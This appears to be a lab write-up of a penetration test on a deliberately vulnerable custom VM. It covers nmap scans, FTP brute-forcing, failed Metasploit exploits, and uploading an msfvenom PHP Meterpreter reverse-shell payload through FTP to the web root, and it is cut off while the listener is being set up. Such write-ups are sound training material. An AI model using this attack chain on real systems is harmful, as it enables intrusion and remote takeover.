👾Metasploitable (Custom 1)
This is a custom vulnerable machine for a penetration testing module. I had to use the provided leaked information to carry out the tasks and gain root privileges within a set time limit.

This documentation covers both the failed and the successful attempts to exploit the custom machine.
Recon: N.A
Reconnaissance was not needed as I was provided with the following leaked credentials:
Username: xxxx
Password: xxxx
Scanning: Nmap
The target IP address was 192.168.249.147
-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-vvvv: Increase verbosity level (use -vv or more for greater effect)
-oA: Output in the three major formats at once
┌──(kali㉿kali)-[~/custom1]
└─$ sudo nmap -p- -sV --open 192.168.249.147 -A -O -vvvv -oA MC1svOpen
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-25 18:20 +08
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
Initiating ARP Ping Scan at 18:20
Scanning 192.168.249.147 [1 port]
Completed ARP Ping Scan at 18:20, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:20
Completed Parallel DNS resolution of 1 host. at 18:20, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:20
Scanning 192.168.249.147 [65535 ports]
Discovered open port 139/tcp on 192.168.249.147
Discovered open port 80/tcp on 192.168.249.147
Discovered open port 21/tcp on 192.168.249.147
Discovered open port 50981/tcp on 192.168.249.147
Discovered open port 2121/tcp on 192.168.249.147
Discovered open port 42984/tcp on 192.168.249.147
Discovered open port 60976/tcp on 192.168.249.147
Discovered open port 36196/tcp on 192.168.249.147
Completed SYN Stealth Scan at 18:20, 6.68s elapsed (65535 total ports)
Initiating Service scan at 18:20
Scanning 8 services on 192.168.249.147
Completed Service scan at 18:22, 126.20s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 192.168.249.147
NSE: Script scanning 192.168.249.147.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.40s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.37s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.00s elapsed
Nmap scan report for 192.168.249.147
Host is up, received arp-response (0.00087s latency).
Scanned at 2022-03-25 18:20:02 +08 for 135s
Not shown: 65505 closed tcp ports (reset), 22 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
2121/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.1
36196/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
42984/tcp open status syn-ack ttl 64 1 (RPC #100024)
50981/tcp open java-rmi syn-ack ttl 64 GNU Classpath grmiregistry
60976/tcp open nlockmgr syn-ack ttl 64 1-4 (RPC #100021)
MAC Address: 00:0C:29:59:43:B7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/25%OT=21%CT=1%CU=31948%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=623D97D9%P=x86_64-pc-linux-gnu)SEQ(SP=CC%GCD=1%ISR=CD%TI=Z%CI=Z%II=I%T
OS:S=7)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=
OS:M5B4ST11NW5%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1
OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11
OS:NW5%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.007 days (since Fri Mar 25 18:12:13 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix
Host script results:
|_clock-skew: mean: 2h00m05s, deviation: 2h49m42s, median: 5s
| nbstat: NetBIOS name: custom1, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| custom1<00> Flags: <unique><active>
| custom1<03> Flags: <unique><active>
| custom1<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 8478/tcp): CLEAN (Couldn't connect)
| Check 2 (port 31899/tcp): CLEAN (Couldn't connect)
| Check 3 (port 31092/udp): CLEAN (Failed to receive data)
| Check 4 (port 54355/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: custom1
| NetBIOS computer name:
| Domain name:
| FQDN: custom1
|_ System time: 2022-03-25T06:22:22-04:00
TRACEROUTE
HOP RTT ADDRESS
1 0.87 ms 192.168.249.147
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.55 seconds
Raw packets sent: 65629 (2.888MB) | Rcvd: 65529 (2.622MB)

🤔💭 Nmap took 135.55 seconds (about 2.25 minutes), which is not long at all for the flags used, and it found the following:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
2121/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.1
36196/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
42984/tcp open status syn-ack ttl 64 1 (RPC #100024)
50981/tcp open java-rmi syn-ack ttl 64 GNU Classpath grmiregistry
60976/tcp open nlockmgr syn-ack ttl 64 1-4 (RPC #100021)
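The summary table above was retyped by hand from the console output. Since the scan was saved with -oA, the same table can be produced directly from the .xml file (MC1svOpen.xml). The script below is an added example for this page, not part of the original write-up; the embedded XML is a constructed sample trimmed to the attributes the parser uses and mirrors the ports found above.

```python
#!/usr/bin/env python3
"""Pull the open-port summary straight out of the nmap XML written by -oA.

Added example; the SAMPLE_XML below is constructed to mirror the scan above.
Run with a real file:  python3 nmap_open.py MC1svOpen.xml
"""
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample: only the elements/attributes open_ports() reads.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="7.92">
 <host>
  <address addr="192.168.249.147" addrtype="ipv4"/>
  <address addr="00:0C:29:59:43:B7" addrtype="mac"/>
  <ports>
   <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd"/></port>
   <port protocol="tcp" portid="22"><state state="closed"/><service name="ssh"/></port>
   <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.2.8" extrainfo="(Ubuntu) DAV/2"/></port>
   <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
   <port protocol="tcp" portid="2121"><state state="open"/><service name="ftp" product="ProFTPD" version="1.3.1"/></port>
   <port protocol="tcp" portid="50981"><state state="open"/><service name="java-rmi" product="GNU Classpath grmiregistry"/></port>
  </ports>
 </host>
</nmaprun>
"""


def open_ports(xml_text: str) -> List[Dict[str, str]]:
    """Return one row per open port: host, port, proto, service name, version string.

    Only ports whose <state state="open"> is set are kept; product, version and
    extrainfo are joined the way nmap prints the VERSION column.
    """
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            version = " ".join(
                v for v in (attrs.get("product"), attrs.get("version"), attrs.get("extrainfo")) if v
            )
            rows.append({
                "host": addr,
                "port": port.get("portid", "?"),
                "proto": port.get("protocol", "?"),
                "service": attrs.get("name", "?"),
                "version": version,
            })
    # Sort numerically so 2121 lands after 139 rather than between 21 and 80.
    return sorted(rows, key=lambda r: (r["host"], int(r["port"])))


def by_service(rows: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group ports by service name; handy for spotting the two FTP listeners at once."""
    grouped: Dict[str, List[str]] = {}
    for r in rows:
        grouped.setdefault(r["service"], []).append(r["port"])
    return grouped


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_XML
    for r in open_ports(text):
        print(f"{r['port']:>5}/{r['proto']:<4} {r['service']:<12} {r['version']}")
```

Pointing it at MC1svOpen.xml gives the port table without retyping, and by_service() makes the "two FTP services" observation that drives the next section fall out of the data.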
👎 Enumeration: "Failed" FTP (NSE)
For enumeration, I will use the Nmap Scripting Engine (NSE) to look for any additional information on the following two FTP services:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
2121/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.1
nmap -sV -p 2121 192.168.249.147 --script=ftp-proftpd-backdoor
┌──(kali㉿kali)-[~/custom1]
└─$ nmap -sV -p 2121 192.168.249.147 --script=ftp-proftpd-backdoor
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:48 +08
Nmap scan report for 192.168.249.147
Host is up (0.0025s latency).
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
nmap -sV -p 21 192.168.249.147 --script=ftp-vsftpd-backdoor
┌──(kali㉿kali)-[~/custom1]
└─$ nmap -sV -p 21 192.168.249.147 --script=ftp-vsftpd-backdoor
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:52 +08
Nmap scan report for 192.168.249.147
Host is up (0.0063s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.26 seconds
nmap -sV -p 21 192.168.249.147 --script=ftp-brute
┌──(kali㉿kali)-[~/custom1]
└─$ nmap -sV -p 21 192.168.249.147 --script=ftp-brute
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:54 +08
NSE: [ftp-brute] usernames: Time limit 10m00s exceeded.
Nmap scan report for 192.168.249.147
Host is up (0.00061s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 830763 guesses in 600 seconds, average tps: 1425.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 600.31 seconds
nmap -sV -p 2121 192.168.249.147 --script=ftp-brute
┌──(kali㉿kali)-[~/custom1]
└─$ nmap -sV -p 2121 192.168.249.147 --script=ftp-brute
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 20:08 +08
NSE: [ftp-brute] passwords: Time limit 10m00s exceeded.
Nmap scan report for 192.168.249.147
Host is up (0.00069s latency).
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 49434 guesses in 607 seconds, average tps: 74.1
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 607.36 seconds
🤔💭 NSE turned up nothing further. For the backdoor scripts that is expected, since they only trigger on the backdoored vsftpd 2.3.4 and ProFTPD 1.3.3c builds, and both ftp-brute runs stopped at the 10-minute default time limit without a hit
👎 Exploitation: "Failed" FTP (Msfconsole)
Using the information from the Nmap scan results, I can attempt to access the 2 FTP ports
🤔💭 The version banner hints that vsftpd on port 21 is not working. However, I will still try Msfconsole to make sure
vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
Execute msfconsole
┌──(kali㉿kali)-[~/custom1]
└─$ msfconsole
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the edit command to open the
currently active module in your editor
msf6 >
search vsftpd
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 >
use exploit/unix/ftp/vsftpd_234_backdoor
options
set rhosts 192.168.249.147 <target IP>
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.249.147 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using
-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
run
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.249.147:21 - Banner: 500 OOPS: vsftpd: cannot locate user specified in 'ftp_username':ftp
[-] 192.168.249.147:21 - Exploit failed: EOFError EOFError
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
🤔💭 True enough, no session was created. I will try port 2121 ProFTPD and see how it goes
search proftp
msf6 > search proftp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow
1 exploit/windows/ftp/proftp_banner 2009-08-25 normal No ProFTP 2.9 Banner Remote Buffer Overflow
2 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
3 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
4 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
5 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
6 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
Interact with a module by name or index. For example info 6, use 6 or use exploit/unix/ftp/proftpd_133c_backdoor
msf6 >
🤔💭 None of these fit: the listed ProFTPD exploits cover 1.2 - 1.3.0 (sreplace), 1.3.2rc3 - 1.3.3b (Telnet IAC), 1.3.3c (backdoor) and 1.3.5 (mod_copy), so version 1.3.1 falls outside all of them

👌 Exploitation: "It Worked" FTP (Login) / Apache
The following leaked information was provided for this exercise:
Username: xxxx
Password: xxxx
We have the following two FTP ports to explore:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
2121/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.1
I will try to connect to the default FTP port 21 first
ftp 192.168.249.147
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.249.147
Connected to 192.168.249.147.
500 OOPS: vsftpd: cannot locate user specified in 'ftp_username':ftp
ftp>
🤔💭 It returned the following error:
500 OOPS: vsftpd: cannot locate user specified in 'ftp_username':ftp
Next, I will try to connect to FTP port 2121
ftp 192.168.249.147 2121
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.249.147 2121
Connected to 192.168.249.147.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.249.147]
Name (192.168.249.147:kali): xxxx
331 Password required for xxxx
Password:
230 User xxxx logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Let me check which remote directory I have logged into
pwd
ftp> pwd
Remote directory: /home/xxxx
ftp>
I will run 'ls' to list the available files and directories
ls
ftp> ls
229 Entering Extended Passive Mode (|||16006|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 xxxx xxxx 4096 Mar 25 13:51 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-rw-r--r-- 1 xxxx xxxx 203 Sep 9 2021 index.html
-rw-r--r-- 1 xxxx xxxx 92905 Sep 9 2021 it.jpg
-rw-r--r-- 1 xxxx xxxx 169 Sep 9 2021 phonenumbers.txt
226 Transfer complete
ftp>
🤔💭 There is an 'index.html', and earlier I noticed that port 80 is running Apache
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
I can download the index.html file with ftp's 'get' command and check whether its content is the same as what the target serves when accessed with 'curl' or a browser
get index.html
ftp> get index.html
local: index.html remote: index.html
229 Entering Extended Passive Mode (|||28981|)
150 Opening BINARY mode data connection for index.html (203 bytes)
100% |****************************************************************************************************************| 203 6.91 MiB/s 00:00 ETA
226 Transfer complete
203 bytes received in 00:00 (183.04 KiB/s)
ftp>
After downloading index.html, I can 'cat' it to see its contents
cat index.html
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ cat index.html
<html>
<body>
<h2>The IT team at your service</h2>
<p>Before you call us, make sure the button on the side is glowing.. </p>
<img src="it.jpg" alt="it.crew" width="1040" height="600">
</body>
</html>
Next, I will use 'curl' to fetch the same page from the target IP for comparison
curl 192.168.249.147
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ curl 192.168.249.147
<html>
<body>
<h2>The IT team at your service</h2>
<p>Before you call us, make sure the button on the side is glowing.. </p>
<img src="it.jpg" alt="it.crew" width="1040" height="600">
</body>
</html>
🤔💭 Both the results are identical!

🤔💭 The default DocumentRoot for Ubuntu's Apache 2.2 packages is /var/www (it became /var/www/html with Apache 2.4). On this machine the site is served from the same directory the FTP login lands in, /home/xxxx, whether because DocumentRoot points there or via a symlink. The security-relevant consequence is that anything written over FTP with the leaked credentials is immediately served by Apache, and if PHP is enabled it will be executed as the web server user.
Reference: https://httpd.apache.org/docs/trunk/getting-started.html#content
👌 Exploitation: "It Worked" FTP / Apache (Msfvenom Payload)
First, I will check which PHP payloads are available in Msfvenom
msfvenom -l payloads | grep php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ msfvenom -l payloads | grep php
cmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL
php/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
php/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6
php/bind_php Listen for a connection and spawn a command shell via php
php/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)
php/download_exec Download an EXE from an HTTP URL and execute it
php/exec Execute a single system command
php/meterpreter/bind_tcp Run a meterpreter server in PHP. Listen for a connection
php/meterpreter/bind_tcp_ipv6 Run a meterpreter server in PHP. Listen for a connection over IPv6
php/meterpreter/bind_tcp_ipv6_uuid Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support
php/meterpreter/bind_tcp_uuid Run a meterpreter server in PHP. Listen for a connection with UUID Support
php/meterpreter/reverse_tcp Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
php/meterpreter/reverse_tcp_uuid Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)
php/reverse_perl Creates an interactive shell via perl
php/reverse_php Reverse PHP connect back shell with checks for disabled functions
php/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.
windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/meterpreter/reverse_hop_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/vncinject/reverse_hop_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
I will take a look at the options for the 'php/meterpreter_reverse_tcp' payload
msfvenom -p php/meterpreter_reverse_tcp --list-options
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ msfvenom -p php/meterpreter_reverse_tcp --list-options
Options for payload/php/meterpreter_reverse_tcp:
=========================
Name: PHP Meterpreter, Reverse TCP Inline
Module: payload/php/meterpreter_reverse_tcp
Platform: PHP
Arch: php
Needs Admin: No
Total size: 34276
Rank: Normal
Provided by:
egypt <egypt@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a Meterpreter server (PHP)
Advanced options for payload/php/meterpreter_reverse_tcp:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go throug
h proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Evasion options for payload/php/meterpreter_reverse_tcp:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
I will proceed to create a payload named 'payload.php' with Msfvenom
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.249.140 lport=5566 -f raw -o payload.php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.249.140 lport=5566 -f raw -o payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34282 bytes
Saved as: payload.php
Next, I will connect to the target using FTP and upload the 'payload.php' file using the 'put' command
put payload.php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ ftp 192.168.249.147 2121
Connected to 192.168.249.147.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.249.147]
Name (192.168.249.147:kali): xxxx
331 Password required for xxxx
Password:
230 User xxxx logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put payload.php
local: payload.php remote: payload.php
229 Entering Extended Passive Mode (|||47813|)
150 Opening BINARY mode data connection for payload.php
100% |***********************************************************************************************| 34282 67.13 MiB/s 00:00 ETA
226 Transfer complete
34282 bytes sent in 00:00 (28.47 MiB/s)
ftp>
Run 'ls' to confirm that the payload has been uploaded successfully
ls
ftp> ls
229 Entering Extended Passive Mode (|||57862|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 xxxx xxxx 4096 Mar 25 13:51 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-rw-r--r-- 1 xxxx xxxx 203 Sep 9 2021 index.html
-rw-r--r-- 1 xxxx xxxx 92905 Sep 9 2021 it.jpg
-rw-r--r-- 1 xxxx xxxx 34282 Mar 28 06:33 payload.php
-rw-r--r-- 1 xxxx xxxx 169 Sep 9 2021 phonenumbers.txt
226 Transfer complete
ftp>
👎 Exploitation: "Failed" Listener (Msfconsole)
I will fire up Msfconsole to create a listener
msfconsole
┌──(kali㉿kali)-[~]
└─$ msfconsole
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
msf6 >
use exploit/multi/handler
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
